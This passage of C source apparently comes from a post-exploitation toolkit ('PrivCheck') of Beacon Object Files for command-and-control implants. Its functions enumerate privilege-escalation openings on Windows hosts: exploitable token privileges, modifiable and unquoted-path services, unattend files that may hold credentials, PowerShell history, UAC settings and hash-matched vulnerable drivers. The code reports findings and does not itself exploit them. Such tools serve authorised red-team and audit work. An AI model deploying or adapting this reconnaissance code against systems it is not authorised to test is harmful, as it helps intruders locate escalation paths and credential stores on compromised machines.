    if (nVulnerable > 0) BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] Found %d modifiable service(s)!\n", nVulnerable);
    else BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] No modifiable services found\n");

modsvc_cleanup:
    if (pConfig) KERNEL32$HeapFree(hHeap, 0, pConfig);
    if (pSD) KERNEL32$HeapFree(hHeap, 0, pSD);
    if (pServices) KERNEL32$HeapFree(hHeap, 0, pServices);
    if (pTokenUser) KERNEL32$HeapFree(hHeap, 0, pTokenUser);
    if (hService) ADVAPI32$CloseServiceHandle(hService);
    if (hSCManager) ADVAPI32$CloseServiceHandle(hSCManager);
    if (hToken) KERNEL32$CloseHandle(hToken);
}

/* ============================================================
 * CHECK: TokenPrivileges
 * ============================================================ */
static BOOL IsVulnerablePrivilege(char * privilegeNameBuffer) {
    static const char * KnownVulnerable[] = {
        "SeAssignPrimaryToken", "SeBackupPrivilege", "SeCreateTokenPrivilege",
        "SeRestorePrivilege", "SeDebugPrivilege", "SeImpersonatePrivilege",
        "SeLoadDriverPrivilege", "SeManageVolumePrivilege", "SeTcbPrivilege",
        "SeTakeOwnershipPrivilege", NULL
    };
    int i = 0;
    while (KnownVulnerable[i]) {
        if (MSVCRT$_stricmp(KnownVulnerable[i], privilegeNameBuffer) == 0) return TRUE;
        i++;
    }
    return FALSE;
}

void CheckTokenPrivileges() {
    HANDLE tokenHandle;

    BeaconPrintf(CALLBACK_OUTPUT, "=== Token Privileges Check ===\n");

    if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &tokenHandle)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[PRIVILEGE] Failed to open process token. Error: %lu\n", KERNEL32$GetLastError());
        return;
    }

    DWORD tokenInfoSize = 0;
    ADVAPI32$GetTokenInformation(tokenHandle, TokenPrivileges, NULL, 0, &tokenInfoSize);
    if (tokenInfoSize == 0) { KERNEL32$CloseHandle(tokenHandle); return; }

    PTOKEN_PRIVILEGES tokenPrivileges = (PTOKEN_PRIVILEGES)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, tokenInfoSize);
    if (!tokenPrivileges) { KERNEL32$CloseHandle(tokenHandle); return; }

    if (ADVAPI32$GetTokenInformation(tokenHandle, TokenPrivileges, tokenPrivileges, tokenInfoSize, &tokenInfoSize)) {
        for (DWORD i = 0; i < tokenPrivileges->PrivilegeCount; ++i) {
            LUID privilegeLuid = tokenPrivileges->Privileges[i].Luid;
            char privilegeNameBuffer[256];
            DWORD bufferSize = sizeof(privilegeNameBuffer);
            if (ADVAPI32$LookupPrivilegeNameA(NULL, &privilegeLuid, privilegeNameBuffer, &bufferSize)) {
                BOOL isEnabled = (tokenPrivileges->Privileges[i].Attributes & SE_PRIVILEGE_ENABLED) == SE_PRIVILEGE_ENABLED;
                BOOL isVulnerable = IsVulnerablePrivilege(privilegeNameBuffer);
                BeaconPrintf(CALLBACK_OUTPUT, "[PRIVILEGE] %s: %s %s\n", privilegeNameBuffer,
                    isEnabled ? "Enabled" : "Disabled", isVulnerable ? "- Vulnerable" : "");
            }
        }
    }

    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, tokenPrivileges);
    KERNEL32$CloseHandle(tokenHandle);
}

/* ============================================================
 * CHECK: UnattendFiles
 * ============================================================ */
void CheckUnattendFiles() {
    char szWinDir[MAX_PATH * 2];
    int NumOfFoundFiles = 0;
    HANDLE hFile;

    BeaconPrintf(CALLBACK_OUTPUT, "=== Unattend Files Check ===\n");

    if (KERNEL32$GetWindowsDirectoryA(szWinDir, sizeof(szWinDir)) == 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UNATTEND_FILES] Failed to resolve Windows directory\n");
        return;
    }

    static const char * UnattendFiles[] = {
        "\\sysprep\\sysprep.xml", "\\sysprep\\sysprep.inf", "\\sysprep.inf",
        "\\Panther\\Unattended.xml", "\\Panther\\Unattend.xml",
        "\\Panther\\Unattend\\Unattend.xml", "\\Panther\\Unattend\\Unattended.xml",
        "\\System32\\Sysprep\\unattend.xml", "\\System32\\Sysprep\\Panther\\unattend.xml", NULL
    };

    for (int i = 0; UnattendFiles[i] != NULL; i++) {
        char FullPath[MAX_PATH * 2];
        USER32$wsprintfA(FullPath, "%s%s", szWinDir, UnattendFiles[i]);
        hFile = KERNEL32$CreateFileA(FullPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile != INVALID_HANDLE_VALUE) {
            BeaconPrintf(CALLBACK_OUTPUT, "[UNATTEND_FILES] Unattend file found: %s\n", FullPath);
            NumOfFoundFiles++;
            KERNEL32$CloseHandle(hFile);
        }
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[UNATTEND_FILES] Found a total of %d unattend files\n", NumOfFoundFiles);
}

/* ============================================================
 * CHECK: UnquotedServicePath
 * ============================================================ */
void CheckUnquotedServicePath() {
    HKEY servicesKey;
    BOOL foundVulnerablePath = FALSE;

    BeaconPrintf(CALLBACK_OUTPUT, "=== Unquoted Service Path Check ===\n");

    if (ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\", 0, KEY_READ, &servicesKey) == ERROR_SUCCESS) {
        char serviceSubkeyName[256];
        DWORD subkeyIndex = 0;
        DWORD subkeyNameSize = sizeof(serviceSubkeyName);
        while (TRUE) {
            subkeyNameSize = sizeof(serviceSubkeyName);
            if (ADVAPI32$RegEnumKeyExA(servicesKey, subkeyIndex++, serviceSubkeyName, &subkeyNameSize, NULL, NULL, NULL, NULL) != ERROR_SUCCESS) break;

            HKEY imagePathKey;
            if (ADVAPI32$RegOpenKeyExA(servicesKey, serviceSubkeyName, 0, KEY_READ, &imagePathKey) == ERROR_SUCCESS) {
                char imagePathValue[1024] = { 0 };
                DWORD valueSize = sizeof(imagePathValue);
                if (ADVAPI32$RegGetValueA(imagePathKey, NULL, "ImagePath", RRF_RT_REG_SZ, NULL, &imagePathValue, &valueSize) != ERROR_SUCCESS) {
                    ADVAPI32$RegCloseKey(imagePathKey); continue;
                }
                if (SHLWAPI$StrStrIA(imagePathValue, " ") == NULL || SHLWAPI$StrStrIA(imagePathValue, "\"") != NULL) {
                    ADVAPI32$RegCloseKey(imagePathKey); continue;
                }
                if (SHLWAPI$StrStrIA(imagePathValue, "System32") != NULL ||
                    SHLWAPI$StrStrIA(imagePathValue, "SysWow64") != NULL ||
                    SHLWAPI$StrStrIA(imagePathValue, ".sys") != NULL) {
                    ADVAPI32$RegCloseKey(imagePathKey); continue;
                }
                BeaconPrintf(CALLBACK_OUTPUT, "[SERVICE_PATH] Service '%s' has an unquoted executable path: %s\n", serviceSubkeyName, imagePathValue);
                foundVulnerablePath = TRUE;
                ADVAPI32$RegCloseKey(imagePathKey);
            }
        }
        ADVAPI32$RegCloseKey(servicesKey);
    }
    if (!foundVulnerablePath) BeaconPrintf(CALLBACK_OUTPUT, "[SERVICE_PATH] No unquoted service paths found\n");
}

/* ============================================================
 * CHECK: PowerShellHistory
 * ============================================================ */
void CheckPowerShellHistory() {
    char szPath[MAX_PATH];
    char szAppData[MAX_PATH];
    DWORD dwSize;
    HANDLE hFile;
    LARGE_INTEGER liFileSize;
    int i, j;
    const char* pszSubPath = "\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt";

    BeaconPrintf(CALLBACK_OUTPUT, "=== PowerShell History Check ===\n");

    dwSize = KERNEL32$GetEnvironmentVariableA("APPDATA", szAppData, sizeof(szAppData));
    if (dwSize == 0 || dwSize >= sizeof(szAppData)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY] Failed to get APPDATA path\n");
        return;
    }

    i = 0;
    while (szAppData[i] != '\0' && i < MAX_PATH - 1) { szPath[i] = szAppData[i]; i++; }
    j = 0;
    while (pszSubPath[j] != '\0' && i < MAX_PATH - 1) { szPath[i] = pszSubPath[j]; i++; j++; }
    szPath[i] = '\0';

    hFile = KERNEL32$CreateFileA(szPath, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        DWORD dwErr = KERNEL32$GetLastError();
        if (dwErr == ERROR_FILE_NOT_FOUND || dwErr == ERROR_PATH_NOT_FOUND)
            BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY] PowerShell history file not found: %s\n", szPath);
        else
            BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY] Error accessing file. Error: %lu\n", dwErr);
        return;
    }

    liFileSize.QuadPart = 0;
    KERNEL32$GetFileSizeEx(hFile, &liFileSize);
    BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY] PowerShell history file found!\n");
    BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY]   Path: %s\n", szPath);
    if (liFileSize.QuadPart >= 1048576)
        BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY]   Size: %lu MB\n", (DWORD)(liFileSize.QuadPart / 1048576));
    else if (liFileSize.QuadPart >= 1024)
        BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY]   Size: %lu KB\n", (DWORD)(liFileSize.QuadPart / 1024));
    else
        BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY]   Size: %lu bytes\n", (DWORD)liFileSize.QuadPart);

    KERNEL32$CloseHandle(hFile);
}

/* ============================================================
 * CHECK: UACStatus
 * ============================================================ */
void CheckUACStatus() {
    HKEY hKey = NULL;
    LONG lResult;
    DWORD dwEnableLUA = 0, dwConsentPrompt = 0, dwSecureDesktop = 0;
    DWORD dwSize = sizeof(DWORD), dwType = 0;
    HANDLE hToken = NULL;
    DWORD dwIntegrityLevel = 0, dwLengthNeeded = 0;
    PTOKEN_MANDATORY_LABEL pTIL = NULL;
    PTOKEN_GROUPS pTokenGroups = NULL;
    HANDLE hHeap = NULL;
    BOOL bIsAdmin = FALSE, bIsElevated = FALSE;
    PSID pAdminSid = NULL;
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;

    BeaconPrintf(CALLBACK_OUTPUT, "=== UAC Status Check ===\n");

    lResult = ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE,
        "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_READ, &hKey);
    if (lResult != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Failed to open registry key. Error: %ld\n", lResult);
        return;
    }

    dwSize = sizeof(DWORD);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "EnableLUA", NULL, &dwType, (LPBYTE)&dwEnableLUA, &dwSize);
    if (lResult == ERROR_SUCCESS)
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] UAC Enabled (EnableLUA): %s\n", dwEnableLUA ? "Yes" : "No");

    dwSize = sizeof(DWORD);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "ConsentPromptBehaviorAdmin", NULL, &dwType, (LPBYTE)&dwConsentPrompt, &dwSize);
    if (lResult == ERROR_SUCCESS) {
        const char* desc = "Unknown";
        switch (dwConsentPrompt) {
            case 0: desc = "Elevate without prompting"; break;
            case 1: desc = "Prompt for credentials on secure desktop"; break;
            case 2: desc = "Prompt for consent on secure desktop"; break;
            case 3: desc = "Prompt for credentials"; break;
            case 4: desc = "Prompt for consent"; break;
            case 5: desc = "Prompt for consent for non-Windows binaries"; break;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] ConsentPromptBehaviorAdmin: %lu (%s)\n", dwConsentPrompt, desc);
    }

    dwSize = sizeof(DWORD);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "PromptOnSecureDesktop", NULL, &dwType, (LPBYTE)&dwSecureDesktop, &dwSize);
    if (lResult == ERROR_SUCCESS)
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] PromptOnSecureDesktop: %s\n", dwSecureDesktop ? "Yes" : "No");

    ADVAPI32$RegCloseKey(hKey); hKey = NULL;

    if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Failed to open process token\n");
        return;
    }

    hHeap = KERNEL32$GetProcessHeap();

    dwLengthNeeded = 0;
    ADVAPI32$GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &dwLengthNeeded);
    if (dwLengthNeeded > 0) {
        pTIL = (PTOKEN_MANDATORY_LABEL)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwLengthNeeded);
        if (pTIL && ADVAPI32$GetTokenInformation(hToken, TokenIntegrityLevel, pTIL, dwLengthNeeded, &dwLengthNeeded)) {
            PUCHAR pCount = ADVAPI32$GetSidSubAuthorityCount(pTIL->Label.Sid);
            if (pCount && *pCount > 0) {
                PDWORD pLevel = ADVAPI32$GetSidSubAuthority(pTIL->Label.Sid, (DWORD)(*pCount - 1));
                if (pLevel) dwIntegrityLevel = *pLevel;
            }
        }
    }

    if (dwIntegrityLevel < SECURITY_MANDATORY_LOW_RID) BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Integrity Level: Untrusted\n");
    else if (dwIntegrityLevel < SECURITY_MANDATORY_MEDIUM_RID) BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Integrity Level: Low\n");
    else if (dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID) BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Integrity Level: Medium\n");
    else if (dwIntegrityLevel < SECURITY_MANDATORY_SYSTEM_RID) { BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Integrity Level: High (Elevated)\n"); bIsElevated = TRUE; }
    else { BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Integrity Level: System\n"); bIsElevated = TRUE; }

    if (ADVAPI32$AllocateAndInitializeSid(&NtAuthority, 2,
            SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pAdminSid)) {
        dwLengthNeeded = 0;
        ADVAPI32$GetTokenInformation(hToken, TokenGroups, NULL, 0, &dwLengthNeeded);
        if (dwLengthNeeded > 0) {
            pTokenGroups = (PTOKEN_GROUPS)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwLengthNeeded);
            if (pTokenGroups && ADVAPI32$GetTokenInformation(hToken, TokenGroups, pTokenGroups, dwLengthNeeded, &dwLengthNeeded)) {
                for (DWORD i = 0; i < pTokenGroups->GroupCount; i++) {
                    if (ADVAPI32$EqualSid(pAdminSid, pTokenGroups->Groups[i].Sid)) { bIsAdmin = TRUE; break; }
                }
            }
        }
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Local Admin Group Member: %s\n", bIsAdmin ? "Yes" : "No");
    if (bIsElevated) BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Process is running with elevated privileges\n");
    else if (bIsAdmin && dwEnableLUA) BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] User is local admin but NOT elevated (UAC filtered token)\n");
    else if (bIsAdmin && !dwEnableLUA) BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] User is local admin and UAC is disabled\n");
    else BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] User is NOT a local admin\n");

    if (pAdminSid) ADVAPI32$FreeSid(pAdminSid);
    if (pTokenGroups) KERNEL32$HeapFree(hHeap, 0, pTokenGroups);
    if (pTIL) KERNEL32$HeapFree(hHeap, 0, pTIL);
    if (hToken) KERNEL32$CloseHandle(hToken);
}

/* ============================================================
 * CHECK: VulnerableDrivers
 * ============================================================ */
static BOOL CompareHashToVuln(char* DriverHash) {
    int i = 0;
    while (VulnerableHashes[i]) {
        if (MSVCRT$_stricmp(VulnerableHashes[i], DriverHash) == 0) return TRUE;
        i++;
    }
    return FALSE;
}

static void resolveDriverImagePath(char* imagePath, char* resolvedPath, size_t pathSize) {
    char szSystemRoot[MAX_PATH * 2];
    if (!KERNEL32$GetEnvironmentVariableA("SystemRoot", szSystemRoot, sizeof(szSystemRoot))) return;

    if (MSVCRT$_strnicmp(imagePath, "\\SystemRoot\\", 12) == 0) {
        USER32$wsprintfA(resolvedPath, "%s%s", szSystemRoot, imagePath + 11);
    } else if (MSVCRT$_strnicmp(imagePath, "System32\\", 9) == 0) {
        USER32$wsprintfA(resolvedPath, "%s\\%s", szSystemRoot, imagePath);
    } else if (MSVCRT$_strnicmp(imagePath, "\\??\\", 4) == 0) {
        MSVCRT$strncpy(resolvedPath, imagePath + 4, pathSize - 1);
        resolvedPath[pathSize - 1] = '\0';
    } else {
        MSVCRT$strncpy(resolvedPath, imagePath, pathSize - 1);
        resolvedPath[pathSize - 1] = '\0';
    }
}

static BOOL CalculateHash(char * szFilePath, char szFileHash[65], const char * szHashAlg) {
    HANDLE hFile;
    HCRYPTPROV hProv;
    HCRYPTHASH hHash;
    BOOL bResult;
    BYTE rgbFile[BUFSIZE];
    DWORD cbRead, cbHash;
    BYTE rgbHash[SHA256LEN];
    CHAR rgbDigits[] = "0123456789abcdef";
    ALG_ID hashAlgId;
    DWORD hashLen;

    if (MSVCRT$_stricmp(szHashAlg, "SHA1") == 0)        { hashAlgId = CALG_SHA1;   hashLen = SHA1LEN;   }
    else if (MSVCRT$_stricmp(szHashAlg, "SHA256") == 0)  { hashAlgId = CALG_SHA_256; hashLen = SHA256LEN; }
    else if (MSVCRT$_stricmp(szHashAlg, "MD5") == 0)     { hashAlgId = CALG_MD5;    hashLen = MD5LEN;    }
    else return FALSE;

    cbHash = hashLen;
    hFile = KERNEL32$CreateFileA(szFilePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL);
    if (hFile == INVALID_HANDLE_VALUE) return FALSE;

    if (!ADVAPI32$CryptAcquireContextA(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) { KERNEL32$CloseHandle(hFile); return FALSE; }
    if (!ADVAPI32$CryptCreateHash(hProv, hashAlgId, 0, 0, &hHash)) { KERNEL32$CloseHandle(hFile); ADVAPI32$CryptReleaseContext(hProv, 0); return FALSE; }

    while ((bResult = KERNEL32$ReadFile(hFile, rgbFile, BUFSIZE, &cbRead, NULL))) {
        if (cbRead == 0) break;
        if (!ADVAPI32$CryptHashData(hHash, rgbFile, cbRead, 0)) {
            ADVAPI32$CryptReleaseContext(hProv, 0); ADVAPI32$CryptDestroyHash(hHash); KERNEL32$CloseHandle(hFile); return FALSE;
        }
    }
    if (!bResult) { ADVAPI32$CryptReleaseContext(hProv, 0); ADVAPI32$CryptDestroyHash(hHash); KERNEL32$CloseHandle(hFile); return FALSE; }

    if (ADVAPI32$CryptGetHashParam(hHash, HP_HASHVAL, rgbHash, &cbHash, 0)) {
        for (DWORD i = 0; i < cbHash; i++) {
            szFileHash[i * 2] = rgbDigits[rgbHash[i] >> 4];
            szFileHash[i * 2 + 1] = rgbDigits[rgbHash[i] & 0xf];
        }
        szFileHash[cbHash * 2] = '\0';
        ADVAPI32$CryptDestroyHash(hHash); ADVAPI32$CryptReleaseContext(hProv, 0); KERNEL32$CloseHandle(hFile);
        return TRUE;
    }
    ADVAPI32$CryptDestroyHash(hHash); ADVAPI32$CryptReleaseContext(hProv, 0); KERNEL32$CloseHandle(hFile);
    return FALSE;
}

void CheckVulnerableDrivers() {
    HKEY servicesKey;
    char resolvedPath[MAX_PATH];
    int NumOfVulnDrivers = 0;

    BeaconPrintf(CALLBACK_OUTPUT, "=== Vulnerable Drivers Check ===\n");

    if (ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\", 0, KEY_READ, &servicesKey) == ERROR_SUCCESS) {
        char serviceSubkeyName[256];
        DWORD subkeyIndex = 0;
        DWORD subkeyNameSize = sizeof(serviceSubkeyName);
        while (ADVAPI32$RegEnumKeyExA(servicesKey, subkeyIndex++, serviceSubkeyName, &subkeyNameSize, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {
            HKEY imagePathKey;
            if (ADVAPI32$RegOpenKeyExA(servicesKey, serviceSubkeyName, 0, KEY_READ, &imagePathKey) == ERROR_SUCCESS) {
                char imagePathValue[1024];
                DWORD valueSize = sizeof(imagePathValue);
                if (ADVAPI32$RegGetValueA(imagePathKey, NULL, "ImagePath", RRF_RT_REG_SZ, NULL, &imagePathValue, &valueSize) == ERROR_SUCCESS) {
                    if (imagePathValue[0] != '\0' && MSVCRT$strstr(imagePathValue, ".sys") != NULL) {
                        resolveDriverImagePath(imagePathValue, resolvedPath, sizeof(resolvedPath));
                        char FileHash[65];
                        const char* HashAlgos[] = { "SHA1", "SHA256", "MD5" };
                        for (int i = 0; i < 3; i++) {
                            if (CalculateHash(resolvedPath, FileHash, HashAlgos[i])) {
                                if (CompareHashToVuln(FileHash)) {
                                    BeaconPrintf(CALLBACK_OUTPUT, "[VULN_DRIVER] Service \"%s\" has a vulnerable driver: %s - Hash: %s\n", serviceSubkeyName, resolvedPath, FileHash);
                                    NumOfVulnDrivers++;
                                    break;
                                }
                            }
                        }
                    }
                }
                ADVAPI32$RegCloseKey(imagePathKey);
            }
            subkeyNameSize = sizeof(serviceSubkeyName);
        }
        ADVAPI32$RegCloseKey(servicesKey);
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[VULN_DRIVER] Found a total of %d vulnerable drivers\n", NumOfVulnDrivers);
}

/* ============================================================
 * Check registry: name -> function pointer
 * ============================================================ */
typedef void (*CheckFunc)(void);
typedef struct {
    const char* name;
    CheckFunc   func;
} CheckEntry;

static CheckEntry g_checks[] = {
    { "alwayselevated",  CheckAlwaysInstallElevated },
    { "autologon",       CheckAutologon },
    { "credmanager",     CheckCredentialManager },
    { "hijackablepath",  CheckHijackablePath },
    { "modautorun",      CheckModifiableAutorun },
    { "modsvc",          CheckModifiableService },
    { "tokenpriv",       CheckTokenPrivileges },
    { "unattendfiles",   CheckUnattendFiles },
    { "unquotedsvc",     CheckUnquotedServicePath },
    { "pshistory",       CheckPowerShellHistory },
    { "uacstatus",       CheckUACStatus },
    { "vulndrivers",     CheckVulnerableDrivers },
};

#define NUM_CHECKS (sizeof(g_checks) / sizeof(g_checks[0]))

/* ============================================================
 * BOF Entry Point
 * ============================================================ */
void go(char *args, int alen) {
    datap parser;
    char *checks_arg = NULL;
    int checks_arg_len = 0;

    if (alen > 0) {
        BeaconDataParse(&parser, args, alen);
        checks_arg = BeaconDataExtract(&parser, &checks_arg_len);
    }

    if (checks_arg == NULL || checks_arg_len <= 1 || checks_arg[0] == '\0') {
        BeaconPrintf(CALLBACK_OUTPUT, "========================================\n");
        BeaconPrintf(CALLBACK_OUTPUT, "  PrivCheck - Running ALL checks\n");
        BeaconPrintf(CALLBACK_OUTPUT, "========================================\n\n");
        for (int i = 0; i < (int)NUM_CHECKS; i++) {
            g_checks[i].func();
            BeaconPrintf(CALLBACK_OUTPUT, "\n");
        }
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "========================================\n");
        BeaconPrintf(CALLBACK_OUTPUT, "  PrivCheck - Running selected checks\n");
        BeaconPrintf(CALLBACK_OUTPUT, "========================================\n\n");

        char buf[1024];
        int len = checks_arg_len - 1;
        if (len >= (int)sizeof(buf)) len = (int)sizeof(buf) - 1;
        for (int c = 0; c < len; c++) buf[c] = checks_arg[c];
        buf[len] = '\0';

        char *token = MSVCRT$strtok(buf, ",; ");
        while (token != NULL) {
            BOOL found = FALSE;
            for (int i = 0; i < (int)NUM_CHECKS; i++) {
                if (MSVCRT$_stricmp(token, g_checks[i].name) == 0) {
                    g_checks[i].func();
                    BeaconPrintf(CALLBACK_OUTPUT, "\n");
                    found = TRUE;
                    break;
                }
            }
            if (!found) {
                BeaconPrintf(CALLBACK_OUTPUT, "[!] Unknown check: %s\n", token);
                BeaconPrintf(CALLBACK_OUTPUT, "[!] Available: alwayselevated, autologon, credmanager, hijackablepath, modautorun, modsvc, tokenpriv, unattendfiles, unquotedsvc, pshistory, uacstatus, vulndrivers\n\n");
            }
            token = MSVCRT$strtok(NULL, ",; ");
        }
    }

    BeaconPrintf(CALLBACK_OUTPUT, "========================================\n");
    BeaconPrintf(CALLBACK_OUTPUT, "  PrivCheck - Complete\n");
    BeaconPrintf(CALLBACK_OUTPUT, "========================================\n");
}


================================================
FILE: SAL-BOF/privcheck/pshistory.c
================================================
#include <windows.h>
#include <stdio.h>
#include "beacon.h"
#include "bofdefs.h"

void go() {
    char szPath[MAX_PATH];
    char szAppData[MAX_PATH];
    DWORD dwSize = 0;
    HANDLE hFile = INVALID_HANDLE_VALUE;
    LARGE_INTEGER liFileSize;
    int i = 0;
    int j = 0;

    const char* pszSubPath = "\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt";

    dwSize = KERNEL32$GetEnvironmentVariableA("APPDATA", szAppData, sizeof(szAppData));
    if (dwSize == 0 || dwSize >= sizeof(szAppData)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY] Failed to get APPDATA path. Error: %lu\n", KERNEL32$GetLastError());
        return;
    }

    i = 0;
    while (szAppData[i] != '\0' && i < MAX_PATH - 1) {
        szPath[i] = szAppData[i];
        i++;
    }

    j = 0;
    while (pszSubPath[j] != '\0' && i < MAX_PATH - 1) {
        szPath[i] = pszSubPath[j];
        i++;
        j++;
    }
    szPath[i] = '\0';

    hFile = KERNEL32$CreateFileA(szPath, GENERIC_READ,
        FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        DWORD dwErr = KERNEL32$GetLastError();
        if (dwErr == ERROR_FILE_NOT_FOUND || dwErr == ERROR_PATH_NOT_FOUND) {
            BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY] PowerShell history file not found\n");
            BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY]   Path: %s\n", szPath);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY] Error accessing file. Error: %lu\n", dwErr);
        }
        return;
    }

    liFileSize.QuadPart = 0;
    KERNEL32$GetFileSizeEx(hFile, &liFileSize);

    BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY] PowerShell history file found!\n");
    BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY]   Path: %s\n", szPath);

    if (liFileSize.QuadPart >= 1048576) {
        BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY]   Size: %lu MB\n", (DWORD)(liFileSize.QuadPart / 1048576));
    } else if (liFileSize.QuadPart >= 1024) {
        BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY]   Size: %lu KB\n", (DWORD)(liFileSize.QuadPart / 1024));
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY]   Size: %lu bytes\n", (DWORD)liFileSize.QuadPart);
    }

    if (liFileSize.QuadPart == 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[PSHISTORY] History file is empty\n");
    }

    KERNEL32$CloseHandle(hFile);
}


================================================
FILE: SAL-BOF/privcheck/tokenprivileges.c
================================================
#include <windows.h>
#include <stdio.h>
#include "beacon.h"
#include "bofdefs.h"

BOOL IsVulnerable(char * privilegeNameBuffer) {
    // Define known vulnerable privileges
    static const char * KnownVulnerable[] = {
            "SeAssignPrimaryToken",
            "SeBackupPrivilege",
            "SeCreateTokenPrivilege",
            "SeRestorePrivilege",
            "SeDebugPrivilege",
            "SeImpersonatePrivilege",
            "SeLoadDriverPrivilege",
            "SeManageVolumePrivilege",
            "SeTcbPrivilege",
            "SeTakeOwnershipPrivilege",
            NULL
    };

    int i = 0;

    while (KnownVulnerable[i]) {
        if (MSVCRT$_stricmp(KnownVulnerable[i], privilegeNameBuffer) == 0) {
            return TRUE;
        }
        i++;
    }
    return FALSE;
}

void DisplayPrivileges(TOKEN_PRIVILEGES* tokenPrivileges) {
    for (DWORD i = 0; i < tokenPrivileges->PrivilegeCount; ++i) {
        LUID privilegeLuid = tokenPrivileges->Privileges[i].Luid;
        char privilegeNameBuffer[256];
        DWORD bufferSize = sizeof(privilegeNameBuffer);
        if (ADVAPI32$LookupPrivilegeNameA(NULL, &privilegeLuid, privilegeNameBuffer, &bufferSize)) {
            BOOL isEnabled = (tokenPrivileges->Privileges[i].Attributes & SE_PRIVILEGE_ENABLED) == SE_PRIVILEGE_ENABLED;
            BOOL isVulnerable = IsVulnerable(privilegeNameBuffer);
            BeaconPrintf(CALLBACK_OUTPUT,"[PRIVILEGE] %s: %s %s\n", privilegeNameBuffer, isEnabled ? "Enabled" : "Disabled", isVulnerable ? "- Vulnerable" : "");
        }
    }
}

void go() {
    HANDLE tokenHandle;
    if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &tokenHandle)) {
        BeaconPrintf(CALLBACK_OUTPUT,"[PRIVILEGE] Failed to open process token. Error: %lu\n", KERNEL32$GetLastError());
        return;
    }

    DWORD tokenInfoSize = 0;
    ADVAPI32$GetTokenInformation(tokenHandle, TokenPrivileges, NULL, 0, &tokenInfoSize);
    if (tokenInfoSize == 0) {
        BeaconPrintf(CALLBACK_OUTPUT,"[PRIVILEGE] Failed to get token information size. Error: %lu\n", KERNEL32$GetLastError());
        goto cleanup;
    }

